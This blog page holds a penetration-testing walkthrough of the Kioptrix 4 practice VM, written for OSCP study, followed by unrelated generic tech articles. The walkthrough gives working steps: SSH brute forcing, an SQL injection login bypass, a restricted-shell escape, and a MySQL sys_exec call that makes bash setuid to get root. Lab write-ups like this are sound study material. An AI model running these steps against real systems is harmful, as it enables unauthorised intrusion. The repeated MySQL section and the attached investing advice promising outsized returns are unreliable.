Kioptrix Level 1.3 (VM #4) Walkthrough

In my efforts to self-study in preparation for the OSCP certification later this year, I’ve been going through some of the intentionally vulnerable Virtual Machines (VMs) on vulnhub.com to sharpen and broaden my penetration testing and hacking skills. Among others I’ve completed, the Kioptrix series of VMs is allegedly similar to what you see in the actual OSCP test, so I’ve been going through them in order.

Part of completing the OSCP is providing a write-up of your hacking adventures to explain how and what you did to hack a server, so I figured I better start now. Other folks do similar write-ups on the VMs on vulnub.com, and I’ll see if they will add this to Kioptrix 1.3 page soon.

Hopefully, someone will find this useful either way.

It should be noted that this VM was known to have at least two possible paths to getting root on the system, and this writeup outline just one.

Discovery

On my local network, this VM turned up with the IP address of 192.168.0.110.

nmap

Running an nmap scan revealed some open ports and running services:

root@kali:~# nmap -v -sS -A -T4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)

Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33

Poking Around

Checking things out by hand based on the nmap scan results, I found there was a login page running on port 80 at http://192.168.0.110

No basic SQL injection working from any initial attempts.

Nothing in the source code of note. Some other basic manual fuzzing and poking around didn’t reveal much either.

Nikto

Nikto turned up some basic stuff about Apache that I thought might be worth looking into later:

Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.

dirb and dirsearch

A basic dirb scan turned up a directory:
http://192.168.0.110/john/

I though that could be a username. Running dirb with a bigger wordlist (big.txt in Kali) turned up another one:
http://192.168.0.110/robert/

Both of those directories contained a file (robert.php and john.php) that, when clicked, would just redirect you back to the main login page.

I also ran DIRSEARCH, a python tool that also works well for finding directories and files.
found file: database.sql

(Note: Dirsearch is not included in Kali by default. Requires you to setup Python 3 in a virtual environment to run it.)

enum4linux

Since ports 139 and 445 were being used, I went on try enum4linux

root@kali:~# enum4linux -a 192.168.0.110
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 9 00:40:35 2017

<em>(Pasting only the relevant stuff here.)</em>
 ===================================================== 
| Enumerating Workgroup/Domain on 192.168.0.110 |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

============================================= 
| Nbtstat Information for 192.168.0.110 |
 ============================================= 
Looking up status of 192.168.0.110
 KIOPTRIX4 &lt;00&gt; - B &lt;ACTIVE&gt; Workstation Service
 KIOPTRIX4 &lt;03&gt; - B &lt;ACTIVE&gt; Messenger Service
 KIOPTRIX4 &lt;20&gt; - B &lt;ACTIVE&gt; File Server Service
 ..__MSBROWSE__. &lt;01&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Master Browser
 WORKGROUP &lt;1d&gt; - B &lt;ACTIVE&gt; Master Browser
 WORKGROUP &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Browser Service Elections
 WORKGROUP &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

============================== 
| Users on 192.168.0.110 |
 ============================== 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

========================================== 
| Share Enumeration on 192.168.0.110 |
 ========================================== 
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename Type Comment
 --------- ---- -------
 print$ Disk Printer Drivers
 IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))

Server Comment
 --------- -------
 KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)

Workgroup Master
 --------- -------
 WORKGROUP KIOPTRIX4

[+] Attempting to map shares on 192.168.0.110
//192.168.0.110/print$ Mapping: DENIED, Listing: N/A
//192.168.0.110/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

===================================================== 
| Password Policy Information for 192.168.0.110 |
 ===================================================== 
[E] Unexpected error from polenum:
Traceback (most recent call last):
 File "/usr/bin/polenum", line 33, in &lt;module&gt;
 from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0

S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)

enum4linux complete on Thu Feb 9 00:40:51 2017

acccheck

I ran acccheck on the ‘robert’ user with the big.txt pw list, to no avail. Can circle back to try the other usernames if needed.

THC Hydra

You can use Hydra to brute force FTP, SSH, POP3, and SMTP account. Let’s try Hydra with those usernames to find SSH accounts! Trying the usernames found via acccheck with SSH logins:

robert
root
loneferret
john

hydra -L users -P 10_million_password_list_top_100000.txt -t 4 192.168.0.110 ssh -vv

Nothing turned up! Bummer.

database.sql

This was found during discover with dirsearch, and it appears to be a short MySQL dump file. Since other avenues were turning out to be fruitless, I thought I’d give this a closer look.

Immediately, the first thing to note is that there’s a username and password shown in the dump file.

john
1234

Let’s try it on the HTML login form at http://192.168.0.110/index.php?. No luck!
I thought maybe that was a default password, so I tested it on the other known users as well (robert, root, loneferret), but still no luck.

Perhaps it’d work with SSH or SMB?
Negatory

The file at least led me to believe MySQL was in place, so perhaps some more SQLi exploration would help.

After a number of failed attempts and errors by trying various SQL injection strings, using this worked:

Username: john
Password: ' OR 1=1 #

That took me to the User Admin Panel and showed the actual password.

That seemed kinda easy. But this is when things got hard, actually.

I logged out and confirmed that the password worked. It logged me back into that same page. But what good is that? Let’s try SSH again!

Shell obtained. However, the shell seemed to be extremely limited. As instructed at login, typing ? or ‘help’ gets you a list of allowed commands:

I was warned about trying to cd into the root directory, and getting kicked out if I tried again.

lpath is the same as pwd.

The only available command that looks somewhat useful is echo. Let’s see if we can echo the contents of .profile


Uh oh. It really did kick me out! Luckily, all I had to do was reconnect via SSH. Let’s try a different file:

Bummer. How about getting around now that we know it is possible to simply re-log via SSH if you get kicked out? No luck.

Must break out of the restricted “LigGoat” shell. To the Google!

Searching for “escape restricted shell echo” I found a handy article:
https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells

Trying a number of things, I finally found the right trick, which is to use Python to switch shells:

echo os.system("/bin/bash")

That was weird, but it worked, and I got a less restricted shell. This website was of much help to find the specific command needed: http://netsec.ws/?p=337

Finally, a useful shell. Well, more useful. It still seems to be a basic user account with no real privileges. So where to next? MySQL exists and can be leveraged to take over a box under the right circumstances, so before exploring other vectors, I decided to start with it.

MySQL

Revisiting the web directory and the application running on the website, I found a handy SQL statement in checklogin.php. This statement had the mysql connection string, including the username and password, which were simply:

user: root
pass: (empty)

That suggested the root password was never changed when MySQL was installed, so this was probably a default installation with few tweaks or security enhancements. Sure enough, I was able to log in:

Things got off track for a while here, as I wasn’t really sure what to do from this point. However, this Google search helped me:

mysql root pwn server

That led me to a Facebook post, of all things:

https://www.facebook.com/notes/security-training-share/mysql-root-to-system-root-with-lib_mysqludf_sys-for-windows-and-linux/865458806817957/

It described the situation perfectly:

“We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.”

The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn’t need to grab it from sqlmap and upload it to the system.

Modifying those instructions a little, there was no need to compile a c script (which I was unable to do as user ‘john’ anyway.

Where that article has this line:

select sys_exec('id &gt; /tmp/out; chown npn.npn /tmp/out');

Just do this instead:
select sys_exec('chmod u+s /bin/bash');

Then drop out of MySQL and run this:
bash -p

It should drop you into a root shell!
cd /root

cat congrats.txt
It described the situation perfectly:
"We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often."

The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn't need to grab it from sqlmap and upload it to the system.

Modifying those instructions a little, there was no need to compile a c script that changes users.

Instead of this line:
select sys_exec('id &gt; /tmp/out; chown npn.npn /tmp/out');

Just do this:
select sys_exec('chmod u+s /bin/bash');

Then drop out of MySQL and run this:

  Ø bash -p

It should drop you into a root shell!

cd /root

cat congrats.txt

Root obtained. Mission complete!

 

Invest With The Best – Which Tech Niches Will Thrive This Year?

Technology companies tend to make significant profits if they remain at the cutting edge. That is why so many people choose to invest their savings in buying shares. However, tech comes and goes, and so you need the most recent information if you want to do that. The last thing anyone wants is to put their money in a niche that’s on its way out. With that in mind, we’ve taken the time to list some of the most thriving technology niches around today. Hopefully, the info will help you to make the right decisions if you plan to invest this year.

Telecoms

The telecoms industry is always a safe place for investors because everyone owns a smartphone these days. Apple releases new products every year, and most people want the latest devices. Even so, it’s wise to invest in a smaller company if you want to make the highest profits. Look for a firm that’s just arranged to lease a cell tower, and perform as much research as possible. The level of risk you face will increase when opting for a new brand. However, as the old saying goes, the only way is up. While investments in established operations are stable, you wouldn’t make a significant profit. So, look for the newest businesses on the market for the best outcomes.

Virtual reality

Virtual reality has become big business during the last couple of years. However, the market still hasn’t reached its potential. For that reason, now is the best time to invest in companies within that niche. There are lots of VR devices available today, and many of them are selling thousands of units. You could make a substantial profit if you find the right firms and get in touch. Don’t make the mistake of waiting until they appear on the stock market to make your investment. For the best results, you need to put your money in a firm that’s just about to explode. That way, you could see a return that sets you up for life.

Gaming

Specialist gaming brands make millions of dollars in profit every single year. Indeed, just take a look at how much Sony and Microsoft make from their consoles. There are also lots of firms that sell accessories and other items associated with the market. Investors just need to perform research to ensure they’re making the right decision. Ideally, you’ll want to find a new company that’s about to release something that will become exceptionally popular. Gaming news blogs are probably the best places to source the information you require. So, bookmark many of them and check them every day.

Now you know about some of the most thriving tech niches around today, we hope you will make conservative investments. When all’s said and done, there is always an element of risk involved. However, you can increase your chances of seeing a healthy return if you do the groundwork. Just take a look at some of the companies in which other investors seem to be putting their money. In most instances, you just need to replicate their actions.

The Top 5 Technology Trends for 2017

Technology is constantly evolving and innovating. This can make keeping abreast of the most current trends challenging. In a world where we are becoming more reliant than ever on technology, it’s important to be tech savvy. This is the low-down on what’s new in the world of tech, what it does, and why it matters…

Paralysis Reversal

Technology is not all about gaming and data. Technology can be used to improve economics and even health. Paralysis is a devastating by-product of spinal cord injuries. It means that the victim will have limited movement in some parts of their body. Scientists are currently trying to use brain implants to restore movement to these people.

Neuroscientists in France are behind this life-changing innovation. Whilst it could still be years before it’s complete, there have been promising developments. Testing has been carried out on animals. A recording device is installed beneath the skull and a pad of electrodes are put around the spinal cord. The two are joined by a wireless connection. What this achieves, in theory, is a system that translates the animals intent to move into an electrical stimulation in the spine. So brain and body are once again working in harmony.

Voice Searches

This was starting to become a big trend last year, and it’s popularity shows no signs of slowing down. Voice search technology allows the user to speak to their phones and instantly receive answers to questions, schedule dates in diaries, and even turn the heating off at home. This technology is set to be introduced to more areas of our lives than ever before. Forget asking your phone the weather, it could be useful in our homes and workplaces too.

Virtual Reality

Virtual reality technology was big news last year and continues to be this year. VR can come in the form of headsets for gaming, immersing you in a virtual world. The latest in VR tech is virtual reality retail, a new three-dimensional environment for users to explore.

Artificial Intelligence

Artificial intelligence is always big news and 2017 is no different. This year we can expect to seem some impressive leaps forward as investment into this kind of tech rises. Autonomous machines are the big new development, vehicles which drive themselves. Businesses will start using machine intelligence to gain insights into better services for customers.

Cheap Power

Solar panels were the tech of choice for eco-conscious consumers. Years after they were first released, these panels still aren’t up to the job. A new solar device promises to succeed where solar panels failed. Scientists are working on a new kind of solar energy device. It will work by transforming heat into beams of light. In theory, this will be cheaper than solar panels and harness far more of the sun’s energy. Turning sunlight into heat and then back into light, is the general idea. This could increase efficiency and provide cheap and continuous energy.

 

The Technology And Business Security Handbook

You need to protect your business. In this day and age the threats are multiple and can come at any time through a consortium of mediums. With the growth of technology security has evolved, but so too has the means and weapons of those willing to do you harm. You need to be ready to protect your business. Otherwise the operational capacity of your business can be called into question, you’ll lose sales, customers, and stop making a money which in its essence a business needs to do to be called a business, or at least a business that is viable. You, and indeed your employees need to be on the lookout for potential threats. The type of your business dictates the kind of security you need. Whether physical, virtual or indeed both. Security has always been an aspect to business usage. Even those in the ancient times used walls and guards, lock and key to keep their stocks secure. This article can help you see what different security is out there and how you can use it to further secure your business. The list is in no specific order, and gives various security solutions that you can employ in your businesses defence. You may already be using some of them, though some you may not have even thought about. You can really get that peace of mind by knowing your livelihood is secure. These can help you to that end.

Cloud Computing

Cloud computing has surged forward in recent years. First a laughable and underpowered invention, now a behemoth that can bring your business into the modern age and catapult it into the future with efficiency. Many businesses have switched to cloud providers, such as the one at VPSServer.com. They use these instead of the same usual tried and tested server systems. Their benefits are huge, but in relation to security they can help your business stay safe. For a start, they can stop the dreaded ddos, or distributed denial of service attacks that are knocking so many businesses offline these days. It means you can continue operating in the face of these attacks which is key to all businesses. It also secures you against some of the nastier viruses and malware. Cloud computing security does not stop there either. It can secure you against employee mistakes, such as someone going on an unprotected site and causing a virus to invest your server systems. Because the server is remote this is mitigated. Cloud security also protects your business from the elements. Your server tower could get destroyed in a storm and cast onto the ground, but if it is stored online, that issue is mitigated. The same can be said of employee mistakes, flooding and fire. For a great leap in computer security you may want to consider the cloud.

There are certain drawbacks. You have to pay a monthly subscription and although it is far more secure, your business details can be viewed by those working for the provider, so make sure you choose a company offering the highest amounts of discretion. On the whole, the technology that is cloud computing can increase your cyber security and ensure your business stays future forward. It is one of the newer premium ways to circumvent security issues.

Always Use Alarms

No matter what kind of premises you own, you need alarms. The technology of alarms have increased rapidly over the last decade or so. They are important in all senses. If you operate out of an office, your equipment could be at risk (though if you use the cloud your data won’t be lost), if you own a restaurant, you could lose some of your cooking equipment. A shop or store of any kind is always at risk too. Alarms can help you mitigate these threats. The issue with alarms is that even the best won’t completely deter the most determined of thieves, yet they are a great tool for putting off chancers and people similar. Especially if you get one of the newest ones that link up to control rooms and call the police or private security from the alarm firm itself. There are a glut to choose from, and it depends what kind of business you have which dictates the type of alarm. If you store high value items on your business location with cash, then you want the best. If not, then you can consider one of the cheaper options. There are many great alarm reviews out there, but you need to always remember to try and put your business with the alarm. Don’t just read the review and accept it, imagine how it would tie in with your business. For example, if you owned a taxi firm and stored the cars outside an alarm would not be much good. Some alarms are just hooked up to doors, others use motion detector beams to pick up on movement in your premises. Again, work out what is right for you and use it. You should always use an alarm system, even if it is just the cheapest you can find. You may not think anything can happen to you, but it can, and you need to do all you can to deter the thieves that may target you.

CCTV

Again, the technology for cctv has surged forward in recent years, especially with the advent of smartphone technology. It is a god send for those who can’t rest easy without knowing their business is safe and secure. You can get some which are motion activated, saving you on electricity bills. They can also send the motion activated footage directly to your smartphone, meaning you can see in real time what is going on and react thusly. When people can see cctv it acts as a deterrent. Thieves don’t want to be seen doing what they do. But they have their answer to cctv, so it is important to buy some of the newer systems that can still get the better of the thieves, such as concealed cameras. They are useful because the footage can be used to capture the thieves and maybe even get back what was stolen. This type of security can help any kind of business if employed in the right way.

Fog Systems

These are systems that when a break in or thievery is detected, deploy a thick screen of fog. It is an offensive way of securing your business and is often best employed in areas where items are of a high value. The intruders will not be able to see anything and be immediately frightened by what has occurred. The technology is amazing and can really see you save your business. The majority will turn and run, and even those who decide to stay will be hampered by next to no visibility. You need to be careful however, as the fog could damage certain products, so make sure they are compatible before employing them throughout your business. Make sure the release is out of reach for employees too, the last thing you want is you or an employee setting it off by mistake.

Electric Fence

A great deterrent for business owners who want to keep their items secure, but need to store them inside. The technology is dangerous, and needs to be properly maintained. Check up on rules and regulations in your local area before installing it too otherwise you could end up in trouble. The tried and tested perimeter fence can be climbed with ease these days, even when it is lined with barbed wire. As such, this injection of technology allows you to keep the thieves at arm’s length with ease. Trying to get into your business will result in a nasty, though non-lethal shock that will make them think twice about coming into your business with nefarious intentions in the future. The only issue arises when you look at your business location. If it is close to a school then you shouldn’t be using an electric fence, or maybe having it switched on only during the night to avoid accidents.

Fingerprint ID

The technology seemed to fade away for a while, but is now back and more reliable than ever before. If you use this on your locks and entry systems then there is less chance any would be thieves of vandals can get in. There will be no lock to pick or break, so they will be forced to bring the door down, something that is far harder to do. Fingerprint identification is a great way for stopping thieves but also a way to restrict certain areas of your business. You can have only your print let you into your office for example. It is a brilliant way of stopping people accessing areas you don’t want them too. Keys can be misplaced, stolen or new ones cut. Fingerprint ID circumvents these issues and gives you the security and peace of mind needed. You can find some of the best door locks here. Evaluate them and choose which you think is the best for your business. Some come with dual locking control, meaning you need the key and a fingerprint for double protection.

Stop! Read This Before You Launch That New Digital Device

There’s plenty of room for innovative new designs to come out in the market of digital technology, both as far as the consumer market and the business market are concerned. If you have an idea of a product that makes the lives of either type of customer more convenient, then it’s worth exploring. However, without the proper approach to developing and launching that device, you could run into some hurdles right from the beginning that make the chances of profiting very slim indeed.

Make sure it has a place on the market

All products have to be driven by demand. There are no two ways about it. If you haven’t been able to identify a market that is lacking for your product, or at least a way that you’re able to position yourself competitively against them, it can be hard to get the product off the ground entirely. People won’t pay attention to the marketing and they won’t see the value for them. Make sure your device is supported by proper research on the digital devices and technologies market. Only once you can find that demand should you be ready to go ahead with the development and the launch.

Prototype, prototype, prototype

There are a lot of demands on tech devices these days. One of the ways you can give yours a competitive edge is by looking a lot deeper into the physical design of the device itself. Not only can rapid prototyping through 3D printers allow you a great understanding of how the device’s dimensions operate in the physical world, providing important information on how convenient it is whether in a consumer’s hand or in a production line. Prototyping is also a good way to better understand the methods you might need to use to manufacture the product. That way, you can also spot the ways that you could cut down on manufacturing costs, increasing the potential return on investment for the device.

Make sure it’s market ready

Convenience and cost-effectiveness aren’t all that matter, however. It needs to actually work when it gets on the market. Certain bugs can be fixed post-launch in a lot of devices, but you need to make sure there are no huge problems waiting for it when the customers get their hands on it. If it’s a product that uses Modbus or other protocols to work together with other networks, then you need to make sure you’ve done compatibility testing to ensure that it can reliably communicate with them. The levels of specific testing your device needs are going to be down to the kind of device. The simple fact is that this is one area of development you cannot skimp on investing in. The tech industry is littered with buggy, broken releases that crashed a product’s potential.

A product needs to have demand to sustain its creation. Then it needs to be market ready, both in terms of its physical composition and the lack of bugs that could otherwise lead to disastrous launch and some very unhappy customers. Make sure that you’re spending the time and effort you need on development.

Remote Control: How To Run An Office From Anywhere

Advancements in technology and society are placing less focus and demand on the need for a centralised workplace. With laptops, tablets, smartphones and the quality of modern software, there’s less need for a workplace anymore.

It has to be said that remote working isn’t a policy that needs to be avoided. We might seem wary of working remotely as it could be seen to have adverse effects on company culture, we might not be able to build rapport or trust with employees or freelancers that we cannot see. That’s not true though.

The massive ace in the hole for remote working is technology. There’s simply no end to the use of technology and it has enabled us the ability to run an office or workplace from anywhere in the world. That’s incredible!

We can video conference using the video communication tools provided by Skype. We can project manage with Trello and Basecamp. Apps like Slack enable us to build a virtual office where we can communicate. There’s simply so much that can be done right now to establish a remote working policy that works. You can even forward your physical mail with mail forwarding which is better than a po box. Cloud storage will also ensure that crucial files are stored online, which means your work can not only be completed from anywhere, it can be accessed from anywhere.

Working remotely isn’t going to be the most amazing thing right away and it certainly isn’t going to work from day one of its implementation in your business. It does require a trained eye and careful, controlled management to work though.

For yourself, you need to ensure there is discipline. When not in the workplace it can be far too easy to procrastinate and not complete tasks. Work remotely in the same manner you would at the workplace for the best success possible. Enforce deadlines for your tasks and treat breaks as just that – a break from work. Working life doesn’t need to fit to the strict nine to five and it should be flexible. Remote working accompanied by discipline is a great way to add flexibility to your workplace.

A good working knowledge of technology can certainly save the day when remote working and knowing what apps to use is crucial to remote working as the majority of your communication will be stunted if you cannot figure out what app is right. Simply put, you’ll need cloud storage capabilities, a word processor, emails and video conferencing tools to do remote working well. You should always be able to communicate with your staff and should always be able to type up your work!

Having reliable equipment is also key. If your computer can’t handle basic tasks, change it out and if your internet connection is spotty, upgrade it or find a 4G workaround. A good laptop will save your day and is completely portable and comes with all the tools and hardware you need to excel at working remotely.

You don’t have to be in an office to run your business!